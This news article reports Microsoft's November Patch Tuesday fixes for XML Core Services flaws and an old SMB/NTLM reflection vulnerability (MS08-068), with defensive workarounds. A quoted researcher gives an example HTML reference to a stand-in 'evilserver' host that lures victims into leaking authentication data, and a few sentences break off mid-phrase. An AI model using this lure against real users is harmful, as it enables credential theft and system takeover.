Microsoft fixes three flaws in its XML Core Services as well as a vulnerability affecting the Server Message Block Protocol for Patch Tuesday. If the SMB vulnerability rings a bell, it's because it was disclosed years ago, one security researcher says.
In a relatively quiet Patch Tuesday, Microsoft
has plugged critical
security holes in Microsoft XML Core Services as well as an old
vulnerability affecting the Server Message Block Protocol.
The bulletin for XML
the more urgent of the two, addresses issues in XML
Core Services versions 3.0, 4.0, 5.0 and 6.0 that exist across numerous
platforms, including Windows 2000, XP, Vista,
Windows Server 2003 and Windows Server 2008. Microsoft Office is also affected.
All of the XML Core Services vulnerabilities require that a hacker trick a
user into visiting a malicious Web page. One of the bugs is a memory corruption
vulnerability that exists in the way XML content is parsed, and could allow
an attacker to take complete control of a vulnerable system.
There is also a cross-domain scripting issue in the way XML Core
Services handles error checks for external document type definitions, and
a third vulnerability due to how XML Core Services handles
transfer-encoding headers. Both bugs could permit an attacker to read data from
a Web page in another domain in Internet Explorer.
Microsoft has included a number of workarounds for each of the
vulnerabilities for organizations that are not immediately able to apply the
November's Patch Tuesday release also features a bulletin for a
vulnerability in the Microsoft
SMB (Server Message Block) Protocol
that could allow a hacker to take
control of a vulnerable system. Though Microsoft only rated it "important," Eric Schultze, CTO of
Shavlik Technologies, called it the more interesting of the two.
"From what I can tell, it appears that MS08-068 is addressing a
vulnerability that was first made public seven (plus) years ago,"
Schultze wrote in an e-mail. "The attacker sends the victim an html e-mail
(or convinces them to visit their Web site) where the html code includes a
reference like: <file://evilserver/picturejpg>. When the victim machine
goes to view this html, it attempts to display the 'picture' jpg."
To display the file, the victim's machine needs to connect to the "evilserver"
machine over NetBIOS ports, he continued. The malicious server asks the victim
to authenticate to it so it can serve up the picture.jpg file. When the victim
performs the NTLM challenge-response authentication process in order to connect
to evilserver, the damage is done. The malicious server now has
challenge-response data that it can use to reply back to the victim's computer-allowing
the attacker to simply connect to the victim's computer without providing any
"I used to demonstrate this attack in classroom training events around
the country," Schultze wrote. "It was very eye-opening for
people to see a very easy-to-use exploit that could result in accessing
anyone's computer on their network."
Those who cannot apply the patch immediately
can enable SMB signing as a workaround to prevent the attacker from
executing code in the context of a logged-on user. Users can also block TCP
ports 139 and 445 at the firewall.